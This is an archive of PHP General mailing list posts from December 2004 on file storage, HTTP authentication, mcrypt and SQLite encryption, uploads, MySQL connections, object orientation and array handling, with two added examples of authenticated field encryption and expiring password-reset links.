Re: [PHP] Re: PHP Security

2004-12-10 Thread I l
Let's say you want to store someone's picture.
In the database, you would insert the picture, who owns that picture, maybe 
the ip address and request headers of where that picture came from, the 
category, sub-category, sub-sub-category in which the picture belongs to, 
etc. You can gather and store as much information about that picture as you 
want with ease.

When you want to access that file and its attributes, you only have to do 
one database query.

Wouldn't you agree that this structure is much easier to manage than storing 
the file in a directory, then storing that extra information in a database? 
Then to retrieve, you must do a database query and find the file in the 
FILESYSTEM (hoping it is still there). The code is much more complex

> > And finally, file management is much much easier when you store the files in
> > a database.
>
> There is a kind of database that is perfectly designed and equipped to store
> files, and their very specific metadata properties, optimized for the correct
> sort of access.
>
> That kind of database is called a FILE SYSTEM.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


Re: [PHP] Re: Why it doesnt work

2004-12-10 Thread Richard Lynch
M. Sokolewicz wrote:
>> Hi I've tried this script and it doesn't seem to work for me. I have typed
>> exactly the same username and password in the script..it keeps on asking for
>> the username and password..pls help...cud this be due to a setting in the
>> php or apache server...am using php 4.3 and apache 1.3.33...the code is
>>
>> >
>>  if (!isset($PHP_AUTH_USER)) {

If you are using PHP with the CGI SAPI, and not as a Module, then HTTP
Authentication WILL NOT WORK.

You can check this with http://php.net/php_sapi_name or, more generally,
http://phpinfo

You also might want to use $_SERVER['PHP_AUTH_USER'] if register_globals is
"OFF" as it should be.

PS  You may want to change your code structure so the block that sends the
headers out isn't repeated.  It makes it rather cumbersome as you have it
now...

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


[PHP] encrypt/decrypt sqlite data

2004-12-10 Thread Shawn McKenzie
This is my first adventure with mcrypt and also the sqlite stuff.

Via file upload I am getting a SQL dump file and running it as a query
to insert data into a sqlite db.  This works great.

Then I am trying to use an update query to encrypt fields in all rows by
using the sqlite_create_function to run my encryption function (that uses
$_SESSION['key'] which is an md5 hash of a pass phrase):

$db = sqlite_open("db");
sqlite_create_function($db, 'enc', 'encrypt', 1);

$sql  = 'UPDATE mytable SET f1=enc(f1);'
       .'UPDATE results SET f2=enc(f2);';
sqlite_query($db, $sql);

function encrypt($txt)
{
    $key = $_SESSION['key'];
    $txt = trim($txt);

    $iv_size = mcrypt_get_iv_size(MCRYPT_CAST_256, MCRYPT_MODE_ECB);
    $iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);

    $black = mcrypt_encrypt(MCRYPT_CAST_256, $key, $txt, MCRYPT_MODE_ECB, $iv);

    return $black;
}

Then to test, I query the db and run each field of data thru a decrypt
function before displaying it:

$db = sqlite_open("db");
$sql = "SELECT * from mytable";
$row = sqlite_array_query($db, $sql);

echo "";
foreach ($row as $k => $v) {
    echo ""
        ."".decrypt($v['f1'])." "
        ."".decrypt($v['f2'])." "
        ."";
}
echo "";

function decrypt($black)
{
    $key = $_SESSION['key'];

    $iv_size = mcrypt_get_iv_size(MCRYPT_CAST_256, MCRYPT_MODE_ECB);
    $iv = mcrypt_create_iv($iv_size, MCRYPT_RAND);

    $txt = mcrypt_decrypt(MCRYPT_CAST_256, $key, $black, MCRYPT_MODE_ECB, $iv);

    return $txt;
}

The problem is that the data that is displayed is not the original data.
Some fields seem to be truncated and some seem to be mostly decrypted
except for the last line or so.  For the fields f1 and f2 I have tried
text and blob.  The actual data is either one word of text or free
flow text with line feeds.

TIA,
Shawn
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
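
Added example, not part of the original post or of any project's code: the symptoms described above are consistent with raw cipher output (which can contain NUL bytes) passing through SQLite text handling and with mcrypt's zero padding, so this version seals each field with AES-256-GCM and stores it base64-encoded. It assumes PHP 7.1 or later with the openssl and sqlite3 extensions; `derive_key`, `seal_field`, `open_field`, the `v1:` prefix, the iteration count and the sample row are all constructed for the illustration.

```php
<?php
// Added example: field-level encryption that survives storage in a text column.
// Function names, the "v1:" prefix and KDF_ITERATIONS are assumptions of this example.

const KDF_ITERATIONS = 200000;

function derive_key(string $passphrase, string $salt): string
{
    // Salted, deliberately slow derivation to 32 raw bytes (the AES-256 key size).
    return hash_pbkdf2('sha256', $passphrase, $salt, KDF_ITERATIONS, 32, true);
}

function seal_field(string $plaintext, string $key): string
{
    $nonce = random_bytes(12);   // fresh per value; GCM must never reuse a nonce under one key
    $tag = '';
    $ct = openssl_encrypt($plaintext, 'aes-256-gcm', $key, OPENSSL_RAW_DATA, $nonce, $tag);
    if ($ct === false) {
        throw new RuntimeException('encryption failed');
    }
    // base64 keeps NUL and other binary bytes out of the text column.
    return 'v1:' . base64_encode($nonce . $tag . $ct);
}

function open_field(string $stored, string $key): string
{
    $raw = strncmp($stored, 'v1:', 3) === 0
        ? base64_decode(substr($stored, 3), true)
        : false;
    if ($raw === false || strlen($raw) < 28) {   // 12-byte nonce + 16-byte tag
        throw new RuntimeException('not a sealed field');
    }
    $pt = openssl_decrypt((string) substr($raw, 28), 'aes-256-gcm', $key,
                          OPENSSL_RAW_DATA, substr($raw, 0, 12), substr($raw, 12, 16));
    if ($pt === false) {
        throw new RuntimeException('authentication failed: wrong key or modified data');
    }
    return $pt;   // exact original bytes, no padding to strip
}

function demo(): array
{
    $salt = random_bytes(16);   // not secret; store it beside the database
    $key = derive_key('constructed pass phrase', $salt);

    $db = new SQLite3(':memory:');
    // Same idea as the post: a user-defined SQL function applied by an UPDATE.
    $db->createFunction('enc', function ($v) use ($key) {
        return seal_field((string) $v, $key);
    }, 1);
    $db->exec('CREATE TABLE mytable (f1 TEXT, f2 TEXT)');

    $original = "free flow text\nwith line feeds\nand a trailing space ";
    $ins = $db->prepare('INSERT INTO mytable (f1, f2) VALUES (:a, :b)');
    $ins->bindValue(':a', 'word', SQLITE3_TEXT);
    $ins->bindValue(':b', $original, SQLITE3_TEXT);
    $ins->execute();

    $db->exec('UPDATE mytable SET f1 = enc(f1), f2 = enc(f2)');
    $row = $db->querySingle('SELECT f1, f2 FROM mytable', true);

    // Flip one stored character to show that modification is detected.
    $tampered = $row['f2'];
    $tampered[10] = $tampered[10] === 'A' ? 'B' : 'A';
    try {
        open_field($tampered, $key);
        $detected = false;
    } catch (RuntimeException $e) {
        $detected = true;
    }

    return [
        'f1' => open_field($row['f1'], $key),
        'f2_round_trip' => open_field($row['f2'], $key) === $original,
        'tamper_detected' => $detected,
    ];
}

var_dump(demo());
```

ECB mode, as used in the post, ignores the IV and encrypts equal plaintext blocks to equal ciphertext blocks; the per-value nonce here avoids that.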


Re: [PHP] Question:maybe urldecode

2004-12-10 Thread Stuart Felenstein

--- Jason Wong <[EMAIL PROTECTED]> wrote:

> > Nothing is printing out on $_POST['var'] or $var
> > s makes sense.
> 
> Now why are you looking in $_POST for your form
> values? They're in $_GET. You 
> said earlier that you understood POST and GET?

I made the correction, using $_GET now.  Values are
printing out, aside from the select lists (arrays)
which print out as "array".

Now I can get the correct values into the text fields,
so they are working, but the drop downs and the select
lists are not.   

I'm not sure, if I need to parse the
(Server(QueryString) or implode the arrays? This is
the big question for me.

Here is all the relevant code. Perhaps someone can see
what it is I'm doing wrong:

?>



'.$row['CareerCategories'].'';


'.$row['States'].'


'.$row['TaxTerm'].'';





Please Select
'.$row['Days'].'';

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] File upload problems using Apache 1.3 on Debian stable

2004-12-10 Thread Richard Lynch
[EMAIL PROTECTED] wrote:
> Hi,
> I have been having problems trying to get file uploads working with
> PHP in a Debian Linux environment. I have ensured that both the temporary
> directory PHP uploads use has the appropriate permissions set, as well
> as the folder I am attempting to copy the images into.
>
> When I called phpinfo() from the page that the upload script is on it
> shows the contents of the _FILE array as containing the appropriate
> details, however when I try and access them from within my actual code,
> the variables appear to be unset, and no files appear in either the
> temporary folder or the folder I am trying to copy the file to.
>
> Anyone have any suggestions?

Did you wrap your code up in a nice function?

Perhaps you need:
global $_FILES;
inside that function.

Or not.  Still haven't worked out which $_XXX are super-global or not in
which versions.

Maybe someday.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



[PHP] Apache - MySQL connection via PHP

2004-12-10 Thread Mike Francis
Hi,
I am having a problem connecting to a MySQL database via PHP.

I have Apache 2.0.52, PHP 5.0.2 and MySQL 4.1 installed and working OK 
individually.
I have copied phpmysql.dll and mysqli.dll at different times to 
Windows/System32.
I have set up a successful MyODBC connection with the database - so it exists.
I can access MySQL from the command prompt, and from a web interface with no 
problem.
However, when I run the following code I get a "Unable to connect to the 
database server at this time." error message.
If some kind soul could point me in the right direction I would be very 
grateful!!
This is the code:
http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd";>
http://www.w3.org/1999/xhtml";>


Our List of Jokes




 Unable to connect to the ' .
 'database server at this time.');
 }
 // Select the jokes database
 if ([EMAIL PROTECTED]('ijdb')) {
 exit('Unable to locate the joke ' .
 'database at this time.');
 }
 ?>
Here are all the jokes in our database:

 Error performing query: ' . mysql_error() . '');
 }
 // Display the text of each joke in a paragraph
 while ($row = mysql_fetch_array($result)) {
 echo '' . $row['joketext'] . '';
 }
 ?>





Re: [PHP] Re: PHP Security

2004-12-10 Thread rogerk
Quoting I l <[EMAIL PROTECTED]>:
> And finally, file management is much much easier when you store the files in
> a database.

There is a kind of database that is perfectly designed and equipped to store
files, and their very specific metadata properties, optimized for the correct
sort of access.

That kind of database is called a FILE SYSTEM.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Re: PHP Security

2004-12-10 Thread I l
I agree with the fact that apache is very secure. I also agree with you that
you shouldn't be 100% comfortable with apache security because there is
always a chance of a security flaw.

But, how many beginner and intermediate PHP developers really know how to
configure Apache for optimal security? And how many of those even have
access to the Apache configurations? How many of those don't keep up to date
with Apache updates and upgrades? As you probably know, it isn't apache or
php that is insecure, it is the programmer's ignorance that causes problems.

I am suggesting that a PHP programmer should write a script to store the
files in a database because they will have absolute control over file
storage. Although they might not be so confident with their apache
configurations, they should be more confident with their own code. Since
this script will be simple to write and have only three operations
(uploading, downloading, checkfile), security flaws will be easier to spot.
Therefore a PHP programmer who doesn't really know how to securely configure
apache would not have to worry too much about a "hacker" figuring out a way
to upload a file and execute it on the server.

And finally, file management is much much easier when you store the files in
a database.

From: Chris Shiflett <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
To: I l <[EMAIL PROTECTED]>, [EMAIL PROTECTED]
Subject: Re: [PHP] Re: PHP Security
Date: Thu, 9 Dec 2004 18:38:49 -0800 (PST)

--- I l <[EMAIL PROTECTED]> wrote:
> the best security practice is to store the jpg file or any other
> uploaded file in your mySql database. This way you never have
> to worry about someone executing php by the url like
> www.example.com/pic.jpg. To view the file, the user would type
> www.example.com/veiw.php?fileID=3425433345.

That's the best? :-)

While I have a great deal of confidence in my code as well, I find it odd
that you trust your own PHP code more than something like Apache, which
has been tested by millions of people worldwide and is very mature.

I would argue that it's more likely that you'll make a mistake in view.php
than it is that you will misconfigure Apache to process images as PHP.

Security is all about knowing what you can trust and what you cannot. A
mistrust of everything (paranoid security) is not a good solution, and
when there is a choice, the one with less risk is more secure. In this
case, I don't agree with your decision. I would put my trust in Apache.

> I can't really see any security problems here.

There are security concerns with everything, even if they're hypothetical
(e.g., even when you can't discover an exploit). Be careful not to ever
get too comfortable. :-)

Chris

=
Chris Shiflett - http://shiflett.org/
PHP Security - O'Reilly HTTP Developer's Handbook - Sams
Coming Soon http://httphandbook.org/
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


Re: [PHP] Multiple Inheritance

2004-12-10 Thread Richard Lynch
> What are some of the things you guys do to get around the
> fact that classes in php4 can't do multiple inheritance?

What I do is not use classes.

At all.

:-)

As a Lisp programmer of over a decade, I think I can safely say I am an OO
proponent.

Yet, every time I sit down to program a web application in PHP, I find
very little (read: nothing) that I want to use OO *for*.

I'm not creating a whole bunch of anything, so the ability to make lots of
the same object never seems useful.

I'm not trying to solve an AI problem. :-)

I've already got simpler and more clear tools to write good code, such as
include and functions.

The overhead of OO is particularly ill-suited to a web environment where
run-times need to be in seconds or less.

I rarely have anything that wants to inherit a lot of behaviour from
something else, and then do something just a bit different.

I mostly just want to grab some data, massage it a bit, format it nicely,
and present it in HTML format.

To tell the truth, 95% of the "OO" code I run into written in PHP is [bleep].

It seems like very very very little thought has gone into the Design of
the classes to be used -- Only the most straight-forward mapping of
everything under the sun into a class is utilized.

Inheritance is seldom used, even when it would be appropriate.

None of the power of OO is used.

OO seems to be used, badly, to separate chunks of code that would be
better served as simple straight-forward functions, include files, or just
plain old one-line PHP rather than 20 lines of a 'class' that does nothing
much.

I find myself digging through 5 files to un-wrap something that turns out
to be a whole lot of nothing when all is said and done.  Ugh!

How is that "Good Code"?!

I'm sure there must be some better PHP OO code out there.  Maybe that 1%
is worth all my pain trying to dig through the maundering mess most PHP
coders make of their application.

But to me, it feels like our profession has decided to force everybody to
use OO, no matter how inappropriate OO might be for the task at hand, or
how inexperienced the lead developer.

In a crude analogy, this would be like forcing every construction company
to be their own architect, and to write their own blueprints.

OO code written by an inexperienced programmer usually ends up being
convoluted and buggy, rather than the clean, well-organized ideal it
strives for -- Worse, it seems TO ME that this code ends up being even
more convoluted and buggy than it would have been if the same
inexperienced programmer just wrote the code as straight-forward
procedural PHP with a few includes and functions.

*GOOD* OO code requires the experience and analysis of an expert to build
a sensible framework, leveraging the common behaviours and properties of
similar code -- or, more rarely but often more spectacular, what seems
like DIS-similar behaviours and properties that, with a shift in
view-point, turn out to be "the same"

Alas, what seems to be "de rigueur" is for some beginner to sit down and
write the very first thing that comes into their mind as a 'class' and
just keep doing that over and over, but never actually *USING* OO for its
benefits.

I will probably be reviled as a heretic, but there it is.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



[PHP] user password managment

2004-12-10 Thread Josh Howe
 

Does anybody have any tips or links for creating a system for managing
user's passwords. I want to make it so that when a user is created, an
email is sent with a link that allows them to set their password. The
link should only work for a set amount of time. I have ideas for
implementing something, but I have a hunch that there is some code
already out there for this. Does anybody know of any? Thanks! 
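
One way to build the expiring set-password link asked about above, as an added example that is not from the original post or from any existing package. It assumes PHP 7.1 or later with PDO and the pdo_sqlite driver; the table layout, the function names, the 24-hour `LINK_TTL`, the example.com URL and the sample user are constructed for the illustration.

```php
<?php
// Added example: expiring, single-use "set your password" link.
// Table names, function names and LINK_TTL are assumptions of this example.

const LINK_TTL = 86400;   // seconds the link stays valid (assumed: 24 hours)

function create_schema(PDO $db): void
{
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password_hash TEXT)');
    $db->exec('CREATE TABLE password_links (
        token_hash TEXT PRIMARY KEY,
        user_id    INTEGER NOT NULL,
        expires_at INTEGER NOT NULL,
        used       INTEGER NOT NULL DEFAULT 0)');
}

function issue_link(PDO $db, int $userId, int $now): string
{
    $token = bin2hex(random_bytes(32));   // 256 bits from the CSPRNG; only the e-mail carries it
    $stmt = $db->prepare(
        'INSERT INTO password_links (token_hash, user_id, expires_at) VALUES (?, ?, ?)');
    // Only a hash is stored, so a leaked table does not contain working links.
    $stmt->execute([hash('sha256', $token), $userId, $now + LINK_TTL]);
    return 'https://example.com/set-password.php?token=' . $token;
}

function redeem_link(PDO $db, string $token, string $newPassword, int $now): bool
{
    if (!preg_match('/\A[0-9a-f]{64}\z/', $token)) {
        return false;   // wrong shape: reject before touching the database
    }
    $hash = hash('sha256', $token);
    $db->beginTransaction();
    try {
        // Claim the token in one statement so two concurrent requests cannot both win.
        $claim = $db->prepare(
            'UPDATE password_links SET used = 1
             WHERE token_hash = ? AND used = 0 AND expires_at > ?');
        $claim->execute([$hash, $now]);
        if ($claim->rowCount() !== 1) {
            $db->rollBack();
            return false;   // unknown, expired or already used
        }
        $find = $db->prepare('SELECT user_id FROM password_links WHERE token_hash = ?');
        $find->execute([$hash]);
        $userId = (int) $find->fetchColumn();
        $find->closeCursor();

        $set = $db->prepare('UPDATE users SET password_hash = ? WHERE id = ?');
        $set->execute([password_hash($newPassword, PASSWORD_DEFAULT), $userId]);
        $db->commit();
        return true;
    } catch (Throwable $e) {
        $db->rollBack();
        throw $e;
    }
}

function demo(): array
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    create_schema($db);
    $db->exec("INSERT INTO users (id, email) VALUES (1, 'user@example.com')");

    $now = 1102700000;   // constructed timestamp
    $token = substr(strrchr(issue_link($db, 1, $now), '='), 1);
    $late  = substr(strrchr(issue_link($db, 1, $now), '='), 1);

    return [
        'first_use'  => redeem_link($db, $token, 'constructed-passphrase', $now + 60),
        'second_use' => redeem_link($db, $token, 'another-passphrase', $now + 120),
        'expired'    => redeem_link($db, $late, 'another-passphrase', $now + LINK_TTL + 1),
        'guessed'    => redeem_link($db, str_repeat('0', 64), 'another-passphrase', $now),
    ];
}

var_dump(demo());
```

Only the first redemption succeeds; the reused, expired and guessed tokens are all refused with the same result, so the response does not reveal which case applied.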



Re: [PHP] array_merge_recursive

2004-12-10 Thread Craig Slusher
foreach ($animal_counts as $animal => $total) {
echo $animal. ':' .$total. '';
}


On Fri, 10 Dec 2004 13:51:36 -0500, Sebastian
<[EMAIL PROTECTED]> wrote:
> actually, what i mean is i need to get the animal name as well..
> 
> ie:
> echo $animal . ' : ' .  $total
> would output:
> 
>  : 
>  : 
> 
> etc. thanks.
> 
> 
> 
> - Original Message -
> From: "Sebastian" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Friday, December 10, 2004 12:24 PM
> Subject: [PHP] array_merge_recursive
> 
> > Hi.
> >
> > I am using this array_merge_recursive to merge two arrays, the array looks
> > like this:
> >
> > Array
> > (
> > [0] => Array
> > (
> > [animal] => Dogs
> > [total] => 5
> >
> > )
> >
> > [1] => Array
> > (
> > [animal] => Cats
> > [total] => 3
> > )
> >
> > [2] => Array
> > (
> > [animal] => Cats
> > [total] => 6
> > )
> >
> > )
> >
> > the output i need is:
> > Dogs 5
> > Cats 9
> >
> > I need to add the total but keep just one animal if its already there. can
> > someone please help? i been stuck for two days. i appreciate it.
> >
> > --
> > PHP General Mailing List (http://www.php.net/)
> > To unsubscribe, visit: http://www.php.net/unsub.php
> >
> >
> >
> 
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
> 
> 


-- 
Craig Slusher
Web Programmer
[EMAIL PROTECTED]

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


Re: [PHP] grabbing source of a URL

2004-12-10 Thread Darren W
What about using just the file command and then looping through the array?

I do this to scrape sites for content (pics, midi's, fonts) by getting the
links from within the html code and using the wwwcopy function in the php
docs.

I am sure there is a better way to do the pattern recognition but this works
for me. Perhaps someone can suggest a more streamlined method.

function getPicInfo($strSiteName, $strPartial)
{
    if ($strSiteName != "")
    {
        $strURL = "http://".$strSiteName."/".$strPartial."/";
        $strMatch = "/gallery/";
        // file() returns the remote page as an array of lines
        $arrBase = file($strURL);
        foreach ($arrBase as $intLine => $strVal)
        {
            $arrTemp = array();
            $strLine = strtolower($strVal);
            array_push($arrTemp, $strLine);
            if (preg_grep($strMatch, $arrTemp))
            {
                // extract the href and do the copy here.
            }
        }
    }
}

So this will look for the string "gallery" in the remote HTML file.
If you want to get everything between this and another match you could set a
flag that outputs the lines to an alternate array...

function getPicInfo($strSiteName, $strPartial)
{
    $blnOutput = FALSE;
    $arrOutput = array();
    if ($strSiteName != "")
    {
        $strURL = "http://".$strSiteName."/".$strPartial."/";
        $strMatch = "/gallery/";      // start marker
        $strMatch2 = "/completed/";   // end marker
        $arrBase = file($strURL);
        foreach ($arrBase as $intLine => $strVal)
        {
            $arrTemp = array();
            $strLine = strtolower($strVal);
            array_push($arrTemp, $strLine);
            if (preg_grep($strMatch, $arrTemp))
            {
                // extract the href and do the copy here.
                $blnOutput = TRUE;
            }
            else if (preg_grep($strMatch2, $arrTemp))
            {
                // extract the href and do the copy here.
                $blnOutput = FALSE;
            }
            if ($blnOutput)
            {
                array_push($arrOutput, $strVal);
            }
        }
    }
    // lines collected between the two markers
    return $arrOutput;
}

It's probably not very nice code, but it will do the job.

Can someone PLEASE help me with my encryption problems?!?!?!

Darren

"Warren Vail" <[EMAIL PROTECTED]> wrote in message
news:[EMAIL PROTECTED]
> Oops missed part of your question;
>
> > know what function to use to grab the page.  for the string
>
> http://us2.php.net/manual/en/function.fopen.php
>
> There are some good samples on the page
>
>$dh = fopen("$url",'r');
>$result = fread($dh,8192);
>
> Hope this is what you need.
>
> Warren Vail
>
>
> > -Original Message-
> > From: Adam Williams [mailto:[EMAIL PROTECTED]
> > Sent: Friday, December 10, 2004 9:56 AM
> > To: [EMAIL PROTECTED]
> > Subject: [PHP] grabbing source of a URL
> >
> >
> > Hi, I don't know what functions to use so maybe someone can
> > help me out.
> > I want to grab a URL's source (all the code from a link) and
> > then cut out
> > a block of text from it, throw it away, and then show the page.
> >
> > For example, if I have page.html with 3 lines:
> >
> > hi
> > 
> > 
> > this is line a
> > 
> > 
> > this is line b
> > 
> > 
> > this is line c
> > 
> > 
> >
> > i want my php script to grab the source of page.html, strip out:
> >
> > 
> > this is line a
> > 
> >
> > and then display what is left, how would I go about doing
> > this?  I don't
> > know what function to use to grab the page.  for the string
> > to remove, I
> > know I can probably do a str_replace and replace the known code with
> > nothing.
> >
> > --
> > PHP General Mailing List (http://www.php.net/)
> > To unsubscribe, visit: http://www.php.net/unsub.php
> >

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



RE: [PHP] Multiple Inheritance

2004-12-10 Thread Justin Palmer
I am sorry for you, Richard, for the vast misunderstanding of OO.

Regards,

Justin Palmer
__
KISS (Keep It Simple, SEARCH)!
Google::getUri( http://www.google.com );
Archives::getUri( http://marc.theaimsgroup.com/?l=php-general );



-Original Message-
From: Richard Lynch [mailto:[EMAIL PROTECTED] 
Sent: Friday, December 10, 2004 10:33 AM
To: Chris Boget
Cc: PHP General
Subject: Re: [PHP] Multiple Inheritance


> What are some of the things you guys do to get around the fact that
> classes in php4 can't do multiple inheritance?

What I do is not use classes.

At all.

:-)

As a Lisp programmer of over a decade, I think I can safely say I am an
OO proponent.

Yet, every time I sit down to program a web application in PHP, I find
very little (read: nothing) that I want to use OO *for*.

I'm not creating a whole bunch of anything, so the ability to make lots
of the same object never seems useful.

I'm not trying to solve an AI problem. :-)

I've already got simpler and more clear tools to write good code, such
as include and functions.

The overhead of OO is particularly ill-suited to a web environment where
run-times need to be in seconds or less.

I rarely have anything that wants to inherit a lot of behaviour from
something else, and then do something just a bit different.

I mostly just want to grab some data, massage it a bit, format it
nicely, and present it in HTML format.

To tell the truth, 95% of the "OO" code I run into written in PHP is
[bleep].

It seems like very very very little thought has gone into the Design of
the classes to be used -- Only the most straight-forward mapping of
everything under the sun into a class is utilized.

Inheritance is seldom used, even when it would be appropriate.

None of the power of OO is used.

OO seems to be used, badly, to separate chunks of code that would be
better served as simple straight-forward functions, include files, or
just plain old one-line PHP rather than 20 lines of a 'class' that does
nothing much.

I find myself digging through 5 files to un-wrap something that turns
out to be a whole lot of nothing when all is said and done.  Ugh!

How is that "Good Code"?!

I'm sure there must be some better PHP OO code out there.  Maybe that 1%
is worth all my pain trying to dig through the maundering mess most PHP
coders make of their application.

But to me, it feels like our profession has decided to force everybody
to use OO, no matter how inappropriate OO might be for the task at hand,
or how inexperienced the lead developer.

In a crude analogy, this would be like forcing every construction company
to be their own architect, and to write their own blueprints.

OO code written by an inexperienced programmer usually ends up being
convoluted and buggy, rather than the clean, well-organized ideal it
strives for -- Worse, it seems TO ME that this code ends up being even
more convoluted and buggy than it would have been if the same
inexperienced programmer just wrote the code as straight-forward
procedural PHP with a few includes and functions.

*GOOD* OO code requires the experience and analysis of an expert to
build a sensible framework, leveraging the common behaviours and
properties of similar code -- or, more rarely but often more
spectacular, what seems like DIS-similar behaviours and properties that,
with a shift in view-point, turn out to be "the same"

Alas, what seems to be "de rigueur" is for some beginner to sit down and
write the very first thing that comes into their mind as a 'class' and
just keep doing that over and over, but never actually *USING* OO for
its benefits.

I will probably be reviled as a heretic, but there it is.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



RE: [PHP] Multiple Inheritance

2004-12-10 Thread Mike
Richard,

Thank you for that.

I've been writing PHP apps for a while now but would not consider myself an
"expert". I just enjoy doing it and I know a fair bit about what I'm doing.
One thing I never quite got into (with PHP) is OO. Why - because nothing I
ever did really seemed to make sense as OO. I could easily write a function
that'd get called one or a few times and that was about it. There didn't
seem to be a need for objects to be used and re-used and my scripts
shouldn't ever run long enough for me to take advantage of OO's abilities.

I was worried that I "didn't get it" (and I still might not... But that's
another issue) but maybe I'm not too far off the mark. It's just useful to
see other people's opinions on this topic. 

Maybe I'll be burned at the stake along with you... ;)

-M


> > What are some of the things you guys do to get around the fact that 
> > classes in php4 can't do multiple inheritance?
> 
> What I do is not use classes.
> 
> At all.
> 
[snip] 
> I will probably be reviled as a heretic, but there it is.
> 

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



RE: [PHP] Multiple Inheritance

2004-12-10 Thread Justin Palmer
I am sorry for you Richard for the vast misunderstanding of OO.

Regards,

Justin Palmer
__
KISS (Keep It Simple, SEARCH)!
Google::getUri( http://www.google.com );
Archives::getUri( http://marc.theaimsgroup.com/?l=php-general );



-Original Message-
From: Richard Lynch [mailto:[EMAIL PROTECTED] 
Sent: Friday, December 10, 2004 10:33 AM
To: Chris Boget
Cc: PHP General
Subject: Re: [PHP] Multiple Inheritance


> What are some of the things you guys do to get around the fact that 
> classes in php4 can't do multiple inheritance?

What I do is not use classes.

At all.

:-)

As a Lisp programmer of over a decade, I think I can safely say I am an
OO proponent.

Yet, every time I sit down to program a web application in PHP, I find
very little (read: nothing) that I want to use OO *for*.

I'm not creating a whole bunch of anything, so the ability to make lots
of the same object never seems useful.

I'm not trying to solve an AI problem. :-)

I've already got simpler and more clear tools to write good code, such
as include and functions.

The overhead of OO is particularly ill-suited to a web environment where
run-times need to be in seconds or less.

I rarely have anything that wants to inherit a lot of behaviour from
something else, and then do something just a bit different.

I mostly just want to grab some data, massage it a bit, format it
nicely, and present it in HTML format.

To tell the truth, 95% of the "OO" code I run into written in PHP is
[bleep].

It seems like very very very little thought has gone into the Design of
the classes to be used -- Only the most straight-forward mapping of
everything under the sun into a class is utilized.

Inheritance is seldom used, even when it would be appropriate.

None of the power of OO is used.

OO seems to be used, badly, to separate chunks of code that would be
better served as simple straight-forward functions, include files, or
just plain old one-line PHP rather than 20 lines of a 'class' that does
nothing much.

I find myself digging through 5 files to un-wrap something that turns
out to be a whole lot of nothing when all is said and done.  Ugh!

How is that "Good Code"?!

I'm sure there must be some better PHP OO code out there.  Maybe that 1%
is worth all my pain trying to dig through the maundering mess most PHP
coders make of their application.

But to me, it feels like our profession has decided to force everybody
to use OO, no matter how inappropriate OO might be for the task at hand,
or how inexperienced the lead developer.

In a crude analogy, this would be like forcing every construction company
to be their own architect, and to write their own blueprints.

OO code written by an inexperienced programmer usually ends up being
convoluted and buggy, rather than the clean, well-organized ideal it
strives for -- Worse, it seems TO ME that this code ends up being even
more convoluted and buggy than it would have been if the same
inexperienced programmer just wrote the code as straight-forward
procedural PHP with a few includes and functions.

*GOOD* OO code requires the experience and analysis of an expert to
build a sensible framework, leveraging the common behaviours and
properties of similar code -- or, more rarely but often more
spectacular, what seems like DIS-similar behaviours and properties that,
with a shift in view-point, turn out to be "the same"

Alas, what seems to be "de rigueur" is for some beginner to sit down and
write the very first thing that comes into their mind as a 'class' and
just keep doing that over and over, but never actually *USING* OO for
its benefits.

I will probably be reviled as a heretic, but there it is.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php




Re: [PHP] array_merge_recursive

2004-12-10 Thread Sebastian
actually, what i mean is i need to get the animal name as well..

ie:
echo $animal . ' : ' .  $total
would output:

 : 
 : 

etc. thanks.

- Original Message - 
From: "Sebastian" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Friday, December 10, 2004 12:24 PM
Subject: [PHP] array_merge_recursive


> Hi.
>
> I am using this array_merge_recursive to merge two arrays, the array looks
> like this:
>
> Array
> (
> [0] => Array
> (
> [animal] => Dogs
> [total] => 5
>
> )
>
> [1] => Array
> (
> [animal] => Cats
> [total] => 3
> )
>
> [2] => Array
> (
> [animal] => Cats
> [total] => 6
> )
>
> )
>
> the output i need is:
> Dogs 5
> Cats 9
>
> I need to add the total but keep just one animal if it's already there. can
> someone please help? i been stuck for two days. i appreciate it.
>
> -- 
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>
>

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



RE: [PHP] grabbing source of a URL

2004-12-10 Thread Vail, Warren
Oops missed part of your question;

> know what function to use to grab the page.  for the string 

http://us2.php.net/manual/en/function.fopen.php

There are some good samples on the page

   $dh = fopen("$url",'r'); 
   $result = fread($dh,8192);

Hope this is what you need.

Warren Vail


> -Original Message-
> From: Adam Williams [mailto:[EMAIL PROTECTED] 
